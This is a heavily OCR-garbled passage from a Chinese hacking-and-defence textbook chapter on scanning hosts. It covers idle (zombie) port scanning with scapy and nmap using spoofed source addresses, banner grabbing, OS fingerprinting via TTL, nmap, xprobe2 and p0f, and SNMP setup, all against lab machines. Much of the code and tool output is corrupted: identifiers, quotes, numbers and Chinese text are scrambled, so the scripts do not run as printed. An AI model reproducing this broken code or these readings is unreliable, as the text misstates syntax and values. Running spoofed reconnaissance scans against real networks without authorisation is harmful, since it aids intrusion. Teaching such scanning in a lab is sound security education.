查看 数据 包 中 IPID 值 ， 如 下 图 所 示 。 如 果 
此 时 IPID 值 为 递增 ， 并且 两 个 数据 包 前 后 
数值 差 1， 这 个 中 间 人 机 器 才 符 合 扫描 要 
求 ， 否 则 无 法 判断 。 


评 开 尖 [ TCP ]### 
version= 4 sport= http 
ihl= 5 dport= ftp data 
tos= Ox0 IPID seq= 0 
len= 40 ack= 1 
id= 444 dataofs= 5 

ag5= reserved= 0 
frag= 0 flags= RA 
ttl= 128 window= 0 
proto= tcp chksum= Ox2b4Tf 
chksum= QOxa555 urgptr= 0 
src= 192.168.1.103 options= [] 
dst= 192.168.1.101  #W##[ Padding ]### 
\options\ load= '\x02\x0Q4\x05\xb4\x01\x03 


有 了 中 间 人 机 器 后 便 可 以 实施 扫描 ， 
具体 操作 步骤 如 下 : 
构建 发 送 给 目标 机 的 数据 包 ， 如 下 图 
所 示 。 这 里 使 用 send 发 送 不 查看 返回 数据 ， 
目标 地 址 是 要 扫描 的 主机 地 址 ， 源 地 址 需 
要 设置 成 中 间 人 地 址 。 


>>> I=IPI() 

>> t=TCPI() 

>>> rd=(i/t) 

>>> rd[IP].dst "192.168.1.1" 
>>> rd[IP].src "192.168.1.103" 
>>> rd[TCP] .flags = 'S' 


先 给 中 间 人 机 器 发 送 一 个 SYN 数 据 
包 ， 记 录 下 IPID 值 ， 如 下 图 所 示 。 接 着 使 
用 send(rd) 命 令 ， 将 数据 包 发 送出 去 ， 使 用 
send 发 送 不 查看 返回 数据 。 
eae report 


Finished sending 1 packets. 
六 


Received 1 packets, got 1 answers, remaining 6 packets 
####[ IP ]### 涯 大 大 [ TCP ]##### 


version= 4 sport= http 
ihl= 5 dport= ftp data 
tos= Ox0 Seq= 0 

len= 40 ack= 1 

id= 4476 dataofs= 5 
flags= reserved= 0 
frag= 0 flags= RA 

ttl= 128 window= 0 
proto= tcp chksum= Ox2b4Tf 
chksum= Qxa537 urgptr= 0 

src= 192.,.168.1.,103 options= [] 


dst= 192.168.1.101 
\options\ 


再 次 快速 给 中 间 人 机 器 发 送 一 个 SYN 
数据 包 ， 查 看 IPID 值 ， 如 下 图 所 示 。 通 过 
比较 两 个 IPID 值 ， 如 果 相 差 为 2， 证 明 目 标 
主机 端口 开放 。 


>>> Srl(rm).display() 

Begin emission: 

Finished sending 1 packets. 
六 

Received 1 packets, got 1 answers, remaining 9 packets 
江 ##[ ” 工 P ] ##### #####[ TCP ]#### 


###[ Padding ]### 
load= '\xX01\xO1\x0O8\NnN\XO0\x0O0' 


version= 4 sport= http 
ihl= 5 dport= ftp data 
tos= OxO seg= 0 

len= 40 ack= 1 

id= 4478 dataofs= 5 
flags= reserved= 0 
frag= 0 flags= RA 

ttl= 128 window= 0 
proto= tcp chksum= Ox2b4f 
chksum= Qxa535 urgptr= 0 

src= 192.168.1.103 options= [| 


###[ Padding ]### 
load= '\x00\x00 DBD' 


dst= 192.168.1.101 
\options\ 


下 面 给 出 一 段 自动 化 测试 代码 ， 具 体 
代码 如 下 : 


#!/usr/bin/python 
import logging 


logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import 大 
# 定 义 一 个 函数 用 于 测试 中 间 人 主机 是 否 合格 
def ipid(mid): 
replyl = srl(IP(dst = mid)/TCP(flags = 
'S') ,timeout=2,verbose=0) # 发 送 SYN 数 据 包 
send(IP(dst = mid)/TCcP (flags="SA'), 
# 发 送 SYN/ACK 数 据 包 


verbose=0) 


第 11 章 ”扫描 无 线 网 络 中 的 主机 


reply2 = srl(IP(dst = mid) /TCP (flags = 
'S') ,timeout=2, verbose=0)# 再 次 发 送 SYN 数 据 包 
if reply2[IP] .id == (replyll[IP]. 
dt2] # 判 断 两 次 SYN 数 据 包 返回 包 是 否 差 值 为 2 
print "IPID meet a criterion" 
# 如 果 差 值 为 2, 符合 要 求 ,询问 是 否 扫描 
response =— raw inpubtl Start 
scanning (Y or N}: ") 
if response == "'Y'"': 
# 输 入 Y 进 入 扫描 ， 需 输入 一 个 目标 机 IP 地 址 
target = raw input ("Enter the IP 
Destination host address: ") 
midscan (target,mid) ## 调 用 扫描 函数 
else: # 不 符合 要 求 做 出 提示 
print"Does not meet the requirements, cannot 
be used as an intermediary machine” 
# 定 义 用 于 扫描 的 函数 
def midscan (target,mid): 
print "\nscanning target™ + target 
+ "with mid" + mid # 打 印 出 一 些 提示 信息 
人 三 三 三 三 三 三 三 一 Open Ports on 


for DorL In range(100,.200}: 
# 循 环 遍历 100-200 的 端口 
臣下 Ye # 给 中 间 人 发 送 一 个 数据 包 
start val = srl(IP(dst=mid)/TCP (fl 
ags="SA',dport=port),timeout=2,vVverbose=0) 
# 给 目标 机 发 送 一 个 伪造 数据 包 
send(IP(src=mid,dst=target) /TCP( 
flags="S",dport=port),verbose=0) 
# 再 给 中 间 人 发 送 数据 包 
end val = srl(IP(dst=mid) /TCP (fla 
gs="SA'),timeout=2,Vverbose=0) 
it end valllP].id == 
val[IP]+2) :  # 判 断 两 次 IPID 值 是 否 为 2 
Brint norE # 符 合 要 求 打印 出 端口 


tacarkal 


二 
pass # 不 符合 要 求 直接 pass 
# 脚 本 主体 部 分 先 打印 提示 信息 


Branmki Mid Scan Silte= 


print LU = Identity Mid Host\n” 

Drint ”2 = perform Mid Scan\n” 

ans = raw input ("Select an Option (1 
Ge 


if ans == '1': # 选 项 1 测试 中 间 人 机 器 ， 输 
入 一 个 IP 地 址 

mid" — raw input( Enter TP address 
to test IPID sequence: ") 

ipid(mid)  ## 调 用 中 间 人 测试 函数 

else: 

if ans == '2':  # 选 项 2 直接 扫描 ， 输 入 中 
间 人 IP 地 址 以 及 扫描 主机 IP 地 址 


mid = raw input ("Enter IP adderss 
for Mid System: ") 
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target = raw input ("Enter IP adderss 
for Scan target: ") 


# 调 用 扫描 函数 


(2) Nmap 工具 。Namp 工具 提供 了 中 
间 人 这 种 扫 摘 方式 ， 当 然 前 提 是 中 间 人 机 
器 符合 要 求 ， 再 进行 扫描 。 有 共 体 操作 步骤 
如 下 : 
[steep 回 使 用 Nmap -p139 192.168.1.103 
-script=ipidseq.nse 命 令 ， 检 验 中 间 人 机 
器 是 否 符 合 要 求 ， 如 下 图 所 示 。 它 的 
判断 依据 仍然 是 IPID 是 不 是 一 个 增 量 
(Incremental) 。 


midscan (target, mid) 


root@kali:~/Test/port# nmap -p139 192.168.1.103 -script=ipidseq.nse 
starting Nmap 7.79 ( https:/,nmap.org ) at 2018-19-27 92:52 EDT 
Nmap scan report for 192.168.1.103 

Host is up (9.00636s latency|. 


PORT STATE SERVICE 
139/tcp open netbios-ssn 
MAC Address: OO:0C:29:A2:4E:07 (VMware) 


Host script results: 
|_ipidseq: Incremental! 


Nmap done: 1 IP address (1 host up) scanned lin 0.61 seconds 


[step 图 使 用 Nmap 192.168.1.1 -sl 192. 
168.1.104 -Pn -p 1-100 命 令 进行 中 间 人 扫 
描 ， 第 一 个 IP 是 需要 扫描 的 目标 机 器 ， 第 二 
个 IP 是 中 间 人 主机 ，-sI 指 定 的 参数 便 是 中 
间 人 ， 如 下 图 所 示 。 


root@kali:~/Test/port# nmap 192.168.1.1 -ST 192.168.1.164 -Pn -p 1-166 
starting Nmap 7.79 ( https://nmap.org ) at 2018-190-27 863:97 EDT 

Idle scan using zombie 192.168.1.104 (192.166.1.104;80); ClLass: Incremental 
Nmap scan report for 192.168.1.1 

Host is up (6.028s latency). 

Not shown: 99 closed|filtered ports 

PORT STATE SERVICE 

B86/tcp open http 

MAC Address: 1lC:FA:68:81:2F:08 [Tp-link Technologies) 


Nmap done: 1 IP address [1 host yup) scanned in 2.24 seconds 


11.2 ”扫描 主机 其 他 信息 


通过 闯 口 扫描 确定 端口 后 ， 根 据 不 同 
端口 判断 目标 主机 可 能 存在 哪些 服务 ， 从 
而 识别 目标 操作 系统 ， 为 后 续 的 防范 工作 
做 准备 。 


11.2.1 ”扫描 banner 信 息 


通过 banner 信 息 可 以 识别 目标 主机 的 软 
件 开发 商 、 软 件 名 称 、 服 务 类 型 、 版 本 号 
等 信息 。 不 过 ， 这 个 banner 信 息 可 修改 ， 
此 识别 并 不 是 很 准确 ， 获 取 banner 信 息 必 须 
要 与 目标 主机 建立 连接 。 
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1. python 脚 本 


使 用 python 脚 本 获取 banner 信 息 ， 有 具体 
代码 如 下 : 


import socket # 导 入 一 个 用 于 网 络 编程 的 库 

anner=so0cket= socEerlsockert- HED 
INET, socket .SOCK STRERAM) # 创 建 连 接 

banne 工 JECaonneeect 192 168 40 21)) 
# 使 用 connect 建 立 关 联 

banner .recVv(1024)# 使 用 recv 函 数 接 收 数 据 

2 vrETP 2 3 Ar 

# 返 回 的 bpanner 信 息 

banner .close()# 使 用 完 对 象 后 记得 关闭 

exXit () # 退 出 python 环 境 


ee Ap 一 5 ee 
运行 脚本 执行 效果 ， 如 下 图 所 示 。 
root@kali:~/Test/port# python 
Python 2.7.15+ (default, Aug 31 2618, 11:;56:;52) 
[GCC 8.2.86] on linux2 
Type "help", "copyright", "credits" or "license" for more information, 
p>> import socket 
p>> banner=socket.socket(socket.AF INET,Socket .SOCK STREAM) 
p>> banner.connect(("192.168.1.165" ,21)) 
p>> banner.recyv|1024) 
'228 (VSFTPd 2.3.,4)\r\n' 
p>> banner.closel) 
b>> exit() 


在 实际 环境 中 很 多 机 器 是 不 允许 获取 
banner 信 息 的 ， 如 果 是 这 样 ，recv 了 图 数 会 
被 挂 起 ， 一 直 等 竺 返回。 下 面 给 出 一 段 脚 
本 ， 可 以 避免 recv 函 数 被 挂 起 ， 具 体 代码 
如 下 : 


#!1/usr/bin/python#python 和 脚本 默认 格式 
import socket # 导 入 socket 库 
import select 4# 导 入 select 库 
# 导 入 sys 库 
if len(sys.argv) !=4: 
# 判 断 输 入 参数 如 果 不 等 于 4, 打印 出 提示 信息 
print "Usage “7 banner greab.py 
[Target IP] [First Port] [Last Port]" 
print "Example spanner qrean py 
Loz To L000 2Z00 
print "Example will grab banners for 
TCP ports 100 through 200 on 192.108.1.1" 
SYS .exit() 


import sys 


ip = sys.argv[1] # 获 取 IP 地 址 
start = int (sys.argv[2])# 获 取 起 始 端口 号 
end = int (sys.argv[3]) # 获 取 结 束 端口 号 
for port in range (start,end): 
# 循 环 获取 端口 
try:  # 创 建 TCP 连 接 
bangrab = socket.socket (socket. 
AF INET, Socket .SOCK STREAM) 
bangrab .Connect ( (ip, port)) 
# 以 相应 的 端口 建立 连接 
ready = select.select([bangrabl], 


[ ] 7 [ ] r 1 # 获 取 返 回信 息 ， 超时 时 间 1s 


if ready[0] : 
# 如 果 返 回信 息 不 为 空 ,将 信息 打印 
Bin TOP PorE SETUDGOEEJ] 
. "+bangrab.recv(1024) 
bangrab .close () 
| 和 本 


# 关 闭 对 象 
# 如 果 超 时 ,就 继续 下 一 个 端口 
执行 脚本 效果 如 下 图 所 示 。 


Foot@kali:~/Test/Service# ./ban grab.py 192.168.1.105 1 500 
TCP Port21.220 (vsFTPd 2.3.4) 


pass 


TCP Port22.SSH-2.0-0penSSH 4.7p1 Debian-8ubuntul 


TCP Port23.000% b0#00' 
TCP Port25.220 metasploitable.localdomain ESMTP Postfix (Ubuntu 


2. dmitry 工 具 


使 用 dmitry 工 具 可 以 获取 banner 信 息 ， 
执行 dmitry -pb 192.168.1.105 命 令 ， 即 可 获 
取 banner 信 息 ， 如 下 图 所 示 。 


Gathered TCP Port inTtormation Tor 197.168.1.195 


| 一 一 一 一 一 一 -mm 一 一 一 一 一 一 一 一 一 一 一 一 一 mm- ~ 


Port state 
Rl/tcp open 
P> 220 (vsFTPd 2.3.4) 
p2/tcp open 
>> SS5H-2.0-0penSSH 4.7p1 Debian-8ubuntul 
23/tcp 
>> 0000 WO# ' 
p25/tcp open 


p> 22D metasploitable.localdomain ESMTP Postfix (Ubuntu) 


53/tcp open 


Portscan Finished: Scanned 150 ports, 144 ports were in state closed 


3. Nmap 工 具 


Nmap 工 具 提 供 了 很 多 已 经 写 好 的 脚 
本 ， 从 而 进行 banner 信 息 的 扫描 ， 有 具体 操作 
步骤 如 下 : 
执行 Nmap -sT 192.168.1.105 -p22- 
-script 二 banner.nse 命 令 ， 可 以 获取 目标 主 
机 22 端 口 的 banner 人 信息， 执行 效果 如 下 图 
所 示 。 


root@kali:~/Test/Service# nmap -5T 192.165.1.105 -p22 --script=banner.nse 
5tarting Nmap 7.79 ( https://nmap.org ) at 2018-10-27 05:21 EDT 
Nmap scan report for 192.168.1.105 

Host is up (6.090435 Latency) . 


PORT STATE SERVICE 

LR2/tcp open 55h 

| _ banner: SSH-2.9-0penSSH 4.7pl1 Debian-8ubuntul 
MAC Address: 099:9C:29:FA:DD:2A (VMware ) 


Nmap done: 1 IP address (1 host up) Scanned in G6.456 seconds 


使 用 Nmap 192.168.1.105 -p 1-100 -sV 
命令 ，-sSV 参 数 表明 使 用 特征 扫描 ， 基 于 特 
征 扫 描 会 显示 出 更 多 的 信息 ， 执 行 效果 如 
下 图 所 示 。 
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rooterali;-/Test/Servyices hmap 192.1565,.1.165 -p 1-165 -SV 
tarting Nmap 7.79 ( https://rmap. = ) at 2018. 10-27 05:41 EDT 
ap Scan report tor 192.168.1.16 
ost i5 Up (日 .9B6215 Latency) - 
ot shown; 94 closed ports 
RT STATE SERVICE VERSION 
/cp vpen futp VsfLpd 2 
RPR2/tcp open ssh DOpenssH 二 a Debian aubuntul (protocol 2.8) 
Ra/tcp open telnet Linux telnetd 
RS/tcp opcn smtp Postfix smtpd 
53/tcp open domain ISC BIND 9.14.2 
Be/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 
MAC Address: AO:AC:29:FA:DD:2A ep 
ServirP Tnfo: Hnst: metasploitabie.1l1ncaldomain: 0S5: Un linux: CPFE: cpe:/o:1inux: linux kernel 


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nnap done: 1 IP address {1 host up) scanned in 6.94 seconds 


人 侈 提示 : 通过 banner 信 息 可 以 获取 端口 对 
应 什么 服务 ， 该 信息 量 少 而 且 不 够 准确 ， 
而 使 用 Nmap 工 具 提 供 的 特征 扫描 ， 可 以 扫 
描 出 更 多 的 信息 。 


4. amap 工 具 


rd 的 扫描 
工具 ， 它 会 识别 在 端口 上 运行 的 应 用 程序 ， 
还 可 以 通过 发 送 触发 数据 包 并 在 响应 字符 串 
列表 中 查找 啊 应 ， 来 识别 基于 非 ASCII 编 码 
的 应 用 程序 。 使 用 语法 格式 如 下 : 
[=S1 [=al [=-m 0ab] [= 


min, max|] [-n connections]|] [-N delayl 
[-w delay] [-e] [-v] TARGET PORT 


使 用 amap 工 具 进 行 扫 描 的 操作 步骤 
如 下 : 
使 用 amap -b 192.168.1.105 22 命 令 ， 
可 以 获取 banner 信 息 ， 如 下 图 所 示 。 


root@kali:~/Test/Service# amap -b 192.168.1.105 22 
amap V5.4 (www.thc.org/thc-anap) started at 2018-10-27 05:31:5 
3 - APPLICATION MAPPING mode 


amapcrap 


Protocol on 192.168.1.105:22/tcp matches ssh - banner: SSH-2.0 
-OpenSsSH 4.7pl1 Debian-8ubuntul\nProtocol mismatch.\n 
protocol on 192.168.1.105:22/tcp matches ssh-openssh - banner: 


SSH-2.0-0penSSH 4.7p1 Debian-8ubuntul\nProtocol mismatch.\n 


Jnidentified ports: none. 


at 2018-10-27 05:32:04 


人 钨 提示 : 使 用 amap -b 192.168.1.105 1-100 
命令 ， 可 以 扫描 区 段 端口 。 


amap 提 供 了 基于 特征 的 扫描 ， 直 接 使 
ot 192.168.1.105 1-100-q 命 令 ， 可 以 进 

行 基于 特征 的 扫描 ， 并 给 出 比较 详细 的 信 
NE 


heng mt de ip amap 152.168.1.165 1-165 -9q 
map V5.4 (www.thc.org/thc-anap) started at 2018-19-27 85:53:29 - APPLICATION MAPPING mode 


Protocol on 192.168.1.165:86/tcp matches http 
Protocol on 192.168,1,165:;21/tcp matches ftp 
rotocol on 192.168.1.195:22/tcp matches ssh 
Protecot on 192.168.1.1605:22/tCcp matches ssh-openssh 
rotocol on 192.168.1.165:8B/tcp matches http-apache-2 
Protocol on 192.168.1.165:23/tcp matches telnet 
Protocol on 192.168,1,195;25/tcp matches smtp 
Protocol on 192.168,1.165;:53/tCcp matches dns 
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二 黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


在 基于 特征 扫描 的 过 程 中 ， 如 果 加 入 
b 参 数 ， 会 使 扫描 结果 更 加 精确 ， 扫 描 结果 
如 下 图 所 示 。 


Foot@kali:—/Test/Service# amap 192.166.1,195 1-1099 -qb 
pmap v5 .4 (www,thc.orgythc-amap) started at 2918-19-27 96;69;93 - APPLICATION MAPPING mode 


Protocol on 192,168,1,165;21/tcp matches Ttp - banner; 22B [VSFTPd 2,3,.4)\r\n53g Please 10gin 
with USER and PASS,\r\n 

rotocol on 192， ce a 165;890/tcp ee http - banner; HTTP/1.1 299 OK\r\nDate Sat, Oct 2 
18 995964 GMT\r\n /2 (Ubuntu) DAV/2\r\nX-Powered-By PHP/S ,2.414-2ubun .19\r\ 
nContent -Length reer ti re peepee -Type phe eee html><head tee 
tasploitable2 - Linux</title>< 

rotocol on 192.168.1.185:80/tcp matches http-apache-2 
27 Oct 2918 995994 GMT\r\nServer Apache/2.2.8 (Ubuntu) DAV/2\r\nX-Powered-By PHP/5.2.3-2ubun 
Ku5.16\r\nContent-Length 891\r\nConnection close\r\nContert-Type text/html\r\n\r\nchtml><head 
p<title>Metasploitable2 - Linux</title> 

Protocot on 192.,165,1,195;22/tcp matches ssh - banner; S55H-2,0-0penSsSsH 4,7pl1 Debian-8ubuntul\ 


- banner: HTTP/1.1 266 OQK\r\nDate Sat, 


Pe col on 192.168.1.185:22/tcp matche 
bbunlul\m 

Protocol on 192.,168,1,1985:;25/tcp matches smtp - banner; 220 metasploitable,localdomain ESMTP 
Postfix (Ubuntu)\r\n 

ol on 192.168.1,195:;23/tcp matches telnet - ban 

Protocol on 192.,168,1,185:;25/tcp matches nntp - eg ‘2 9 I localdomain ESMTP 
Postfix (Ubuntu)\r\n592 5。 5,2 Error command not recognized\r\n 

r tcp matches dns - banner: \f 


sh-openssh - banner: SSH-2.86-0penSSH 4.7p1 Debian-8 


11.2.2 ”探索 主机 操作 系统 


操作 系统 安装 完成 后 总 会 默认 打开 一 
些 问 口 ， 针 对 这 些 默 认 端 口 可 以 判断 出 一 
个 系统 的 类 型 ， 当 然 操作 系统 的 识别 种 类 
繁多 ， 更 多 的 是 采用 多 种 技术 组 合 比较 来 
进行 确认 。 


1. 主动 式 扫 摘 的 一 些 方法 


首先 通过 主动 扫描 收集 信息 ， 然 后 将 
收集 的 信息 进行 特征 比 对 ， 由 此 推断 出 操 
作 系 统 类 型 的 方式 。 

(1) python 工具 。 基 于 TTL 值 进行 扫 
描 的 方式 ， 根 据 不 同 操作 系统 TIL 值 不 同 
的 特征 来 进行 判断 。Windows 默认 TTL 值 
是 128 (65 一 128) ，Linux/Unix 默认 TTL 
值 是 64 (1 一 64) ， 也 有 某 些 Unix 默认 
TTL 值 是 255。 基 于 TITL 值 进 行 判 断 的 脚 
本 ， 具 体内 容 如 下 : 


#!/usr/bin/python 

from scapy.all import* 

import logging 

logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 

import sys 

if lenl(sys.argv) !=2 : 
Elo Dy [Tiaragee el 
SEE on pr L922 IE 


print "Usage 

print "Example 
LN 

print "Example will perform 七 | 
analysis to attempt to determine wheter 
the system is windows or Linux/Unix " 

SYS .exit() 


ip=sys.argv[1]  # 获 取 IP 地 址 
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ans=earililiER(tdstE = strtipll /iCMell: 
timeout=1, verbose=0)# 发 送 ICMP 数 据 包 
if ans == None:# 如 果 没 有 回复 信息 ,做 出 提示 
print "NO response was returned ™ 
elif int(ans[IP] .ttl)<=64:# 如 果 TTL 值 
小 于 64, 提 示 Linux/Unix 系 统 
prink ”Host 193 Giniae/Unix” 
# 都 不 是 提示 Windows 系统 


print "Host is Windows” 


使 用 python 脚 本 识别 系统 ， 执 行 脚本 两 
次 ， 分 别 扫描 Linux 系 统 与 Windows 系 统 ， 
执行 效果 如 下 图 所 示 。 


root@kali:~/Test/Service# 
ost is Linux/Unix 
root@kali:~/Test/Service# 


(2) Nmap 工具 。 使 用 Nmap 工具 来 判 
断 操 作 系 统 ， 具 体操 作 步 又 如 下 : 
使 用 Nmap 192.168.1.103 -O 命 令 来 进 
行 打 描 ， 打 描 Windows 操 作 和 系统， 并且 给 出 
了 以 下 参考 信息 ， 如 下 图 所 示 。 


OoTHKali:~/Test/Se es# naap I927.165.1.163 -TU 
gear ting Nmap 7.79 ( bh s:f//nmp.o0rg ) at 2018-10-27 95:35 EDT 
map 5can report for 192.168.1.103 
ost is up (6.69665S5 latency). 
Mor shown: 996 closed ports 
STATE RE 
135/tcp pp 
139/TCp open nerblos- SS 
M45/tcp open microsoft-ds 


869/tcp op lap 
C Address: 00:0C:29: A2:4€:07 [VMware) 
ev ee pe pen wth 有 
ft Windows 2000|xp)2003 


ng: 
bs "COPE: 本 rh nierosort: aime 899 2 pis dy Miereedt: windows 2880; ;5p3 cpe:/0; :herooodt: :Window 
;_2000: :sp4 cpe:/ p: e:/0:microsof / 


else: 


./ttl os.py 192.168.1.105 


./ttl os.py 192.168.1.103 


ft wide A ye ?na3 : be dp resi dy 到 让 站 
bs detalis: Mcrosoft no 2000 SP2 ” 5P4，Windows XP SPZ - 5P3，Or Windows Server 2663 9 ”SPZ 
Net 


nS nh tlhe prt je bs ge ee ee at https:;//nmap.org/Subnit/ ， 
Nmap do dress (1 Up) 5 d in 2.89 


使 用 Nmap 打 描 Linux 系 统 的 信息 ， 执 
行 效果 如 下 图 所 示 。 


ootEKkali:-/Test/Service# nmap 192.168.1.195 -0 
tarting i 7.7@ ( https://nmap.org ) at 2018-18-27 66:38 EDT 
map Scan report for 192.168.1.195 

ost 15 Up (8.08066s latency). 

ot shown: 977 closed ports 

ORT STATE SERVICE 

1l/tcp open ftp 

2/tcp open ssh 

3/tcp open telnet 

Stcp open smtp 

3/tcp op i 

AC Address: 66:6C:29:FA:DD:2A 【VMware) 

evice type: ee purpose 

unning: Linux 2.6. 

D5 CPE: cpe: pt Cs Linux kernel:2.5 

PS detait5: Linux 2.6.9 - 2.6.33 

etwork Distance: 1 hop 


Ds detection performed. Please report any incorrect results at https://nmap.org/submit/ 
Nmap done: 1 IP address [1 host up) scanned in 2.88 Seconds 


(多 提示 : 从 扫描 出 的 信息 中 可 以 看 到 Nmap 
是 基于 CPE 信 息 来 判断 操作 系统 的 版 本 ， 
CPE 是 一 个 国际 化 、 标 准 化 组 织 ， 不 论 是 软 
件 还 硬件 ， 通 过 CPE 分 配 一 个 编号 ， 因 此 通 
过 CPE 编 号 可 以 匹配 系统 类 型 。 


(3) xprobe2 工具 。xprobe2 是 一 个 针 
对 操作 系统 的 扫描 工具 ， 扫 描 的 结果 并 


不 是 很 准确 ， 仅 供 参 考 。 有 具体 操作 步 怠 
如 下 : 
使 用 xprobe2 192.168.1.103 命 令 ， 
扫描 Windows 操 作 系 统 ， 执 行 效果 如 下 图 
所 示 。 


rootekati:-# xprobe2 192.168.1.103 


Xprobe2 v.96.3 Copyright (c) 2662-26965 fyodoreoego.nu，ofiresys-security.com，meder@obo_.nu 


+] Host 192.168.1.193 Running 05: :B660U (Guess probability: 915) 
+)] Dther gquesses: 
+] Host 192.168.1.183 Runnin 9 ODS: IWW0U (Guess probability: 91%) 
+] Host 192.168,1.193 Running 0S; $:@860U (Guess probability; 91%) 
+] Host 192.168.1.193 Running 05: 6:686U (Guess probability: 91%) 
+] Host 192.168.1.193 Running 05: 6$:060U (Guess probability: 915) 
+] Host 192.168.1.163 Running DS: 6:660U (Guess probability: 91s) 
[+] Host 192.1658,.1,.193 Running O05: $:8860U (Guess probabitity: 91%) 
[+] Host 192.168.1.193 Running 0S: 6:666U (Guess probability: 91%) 
+] Host 192.168.1.193 Running 05: 6:B66U (Guess probability: 915) 
+] Host 192.168.1.163 Runnin 9 DS: :和 86U (Guess probability: 91s) 
上 Cleaning up scan engine 
+] Modules deinitialized 
[+] Execution completed, 


使 用 xprobe2 工 具 扫 描 Linux 系 统 ， 执 
行 效 果 如 下 图 所 示 。 


rootgkaLI:-## xprobe2 192.168.1.165 


vv rr 一 


ee V.0.3 Copyright (Ch 29692-2095 fyodor@ogo.nyu, ofir@sys-security.com, meder@oeo.ny 


[+] Host 192.168.1.165 Running 0S:  yYCV (Guess probability: 108%) 
i+] Dther guesses:; 

+] Host 192.168.1.165 me 05: “ycV (Guess probability: 1965) 
“¥yCY [Guess probability: 1085) 
“yYCV 【Guess probability:; 196%) 
“yYCV [Guess probability: 1095) 
“ycCY (Guess probability: 1965s) 


[+ ] Host 192.168.1.165 Running 0S: 
+] Host 192,.168.1,165 or 0sS : 
+] Host 192.168.1.165 Running 05: 
+] Host 192.168.1.165 Running 0S: 
+] Host 192.168.1.165 Running 0S: ‘ycCYV [Guess probability: i108%) 
+] Host 192.168.1.165 Running 0S: “yYCV [Guess probability: 1996%) 
+] Host 192.168.1.165 Running 05: “yYCV (Guess probability: 1065) 
+]】 Host 192.168.1.165 Running 0S: “ycCY (Guess probability: 1885) 
+] Cleaning up scan engine 

+] Modules deinitialized 


Tr 


2. 被 动 式 扫 摘 


通过 网 络 监听 、 抓 包 的 方式 收集 信 
上 号 ， 结 合 ARP 地 址 欺骗 《可 以 实现 端口 镜 
像 的 效果 ) 抓 取 数据 包 可 以 识别 全 网 段 系 
统 类 型 。 

使 用 Kali 系 统 中 的 一 款 被 动 扫 摘 工 
具 p0f， 可 以 进行 被 动 式 扫 描 。 操 作 步 又 
Tr 
打开 p0f 工 具 ， 上 默认 开始 监听 eth0 网 
ee 执行 效果 如 下 图 所 示 。 


Pe ~# pOf 
--- pof 3.09b by Michal Zalewski <lcamtuf@coredump.cx> --- 


[+] Closed 1 file descriptor. 

[+] Loaded 322 Signatures from '/etc/pQf/pQf.fp'. 

[+] Intercepting traffic on default interface 'eth9'. 
[+] Default packet filtering configured [+VLAN]. 

[+] Entered main event loop. 


一 旦 有 数据 包 经 过 eth0 网 卡 便 会 被 pOf 
捕获 ， 通 过 捕获 的 数据 包 进 行 分 析 ， 它 会 
be ed 信息 量 
还 是 比较 大 的 ， 这 里 只 截取 了 部 分 信息 ， 
如 下 图 所 示 。 opt 些 信息， 可 以 探 
索 主机 的 操作 系统 类 别 。 


第 11 章 ”扫描 无 线 网 络 中 的 主机 


-[ 192.1658.1.191/499909 -> 561.213.183.154/89 (syn) J- 


client = 192.168.1.1691/4990D 
05 = Linux 3.11 and newer 
dist =0 

params = none 


raw Sig = 4:64+0:0:1460:ms5s*20,7:ms5,sok,ts,nop,ws:df,id+:0 


-| 192.168.1.161/49900 -> 61.213.183.154/89 (http request) ] - 


| 
| client 


= 192.168.1.101/49900 
| app = Safari 5.1-6 
| lang = English 
| params = dishonest 


| raw sig = 1l:Host,User-Agent,Accept=[+*/*],Accept-Language=[en-Us,en; 
=0.5] ,Accept-Encoding=[gzip, deflate],?Cache-Control,Pragma=[no- cache 
,Connection=[keep-alive]:Accept-Charset,Keep-Alive:Mozilla/5.0 (X11; 
inux X86 64; rv:60.0) Gecko/20160191 Firefox/60.9 


11.2.3” 扫 换 SNMP 


SNMP 是 简单 网 络 管理 协议 ， 使 用 的 是 
UDP 端口 中 的 161、162 端 口 ， 其 中 ， 服 务 
端 使 用 的 是 161 端 口 ， 客 户 端 使 用 的 是 162 
端口 。 通 过 SNMP 可 以 管理 网 络 中 的 交换 
机 、 服 务 器 、 防 火 墙 等 设备 ， 从 而 查看 网 
络 中 这 些 设 备 的 详细 信息 。 


1. 构建 测试 环境 


这 里 采用 虚拟 机 安装 Windows XP 操 作 
系统 来 进行 测试 。 如 何 安装 Windows XP 系 
统 这 里 不 做 讲解 ， 只 讲解 如 何在 Windows 
XP 系 统 下 配置 SNMP。 

具体 的 操作 步骤 如 下 : 
打开 控制 面板 ， 找 到 “添加 /删除 程 
序 ” 图 标 ， 如 下 图 所 示 。 


在 打开 的 “添加 或 删除 程序 ”对 话 框 
中 ， 单 击 “ 添 加 删除 Windows 组 件 ” 图 标 ， 
如 下 图 所 示 。 


四 生 加 或 盎 除 三 序 


三 显示 更 新 癌 ] 


rao [ET 辐 
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黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 〈 超 值 版 ) 


打开 “Windows 组 件 向 导 ” 对 话 框 ， 

双击 “管理 和 监视 工具 ”组 件 ， 如 下 图 

所 示 。 
CE 


Tindewrs 才 件 
可 届 添 加 或 项 除 申 adows XF 的 过 和 首 。 


3 


姐 件 LC): 


司 附 件 和 工具 

加 吾 新 根 目 录 证 书 0.0 ME 

口 引 9 管理 和 上 览 视 工具 2.0 了 中 | 
口 让 其 地 网 阁 训 件 和 打印 服 劳 0.0 中 -| 
挫 述 : 具 [开始 」 菜 单 息 泉 面 添加 或 册 际 对 Iniernet Explorer 的 态 问 
所 十 磁盘 空间 : 56.9 E | 

可 用 袖 盘 空间 : 33027.6 是 52221 


< | 
打开 “管理 和 监视 工具 ”对 话 框 ， 在 


其 中 选中 管理 和 监视 工具 的 子 组 件 列表 框 
中 两 个 选项 ， 如 下 图 所 示 。 


EEEEEOII > 
要 天 加 莹 二 验 基 个 做， 请 所 事 考 光 的 逢 过 柑 。 克 包 杠 衣 地 只 会 安装 这 引 件 的 一 


管理 和 监视 工具 的 子 组 件 C): 


回电 简单 网 结 管理 协议 


单 击 “ 确 定 ” 按 钮 ， 会 提示 插入 安装 
光盘 ， 如 下 图 所 示 。 
FEED > 


(.) 请 将 标 浴 “ 业 ndows XP Professional Service 
一 Pack 3 [CD′ 的 光盘 插入 CD-RON 驱动 器 器 :), 烘 


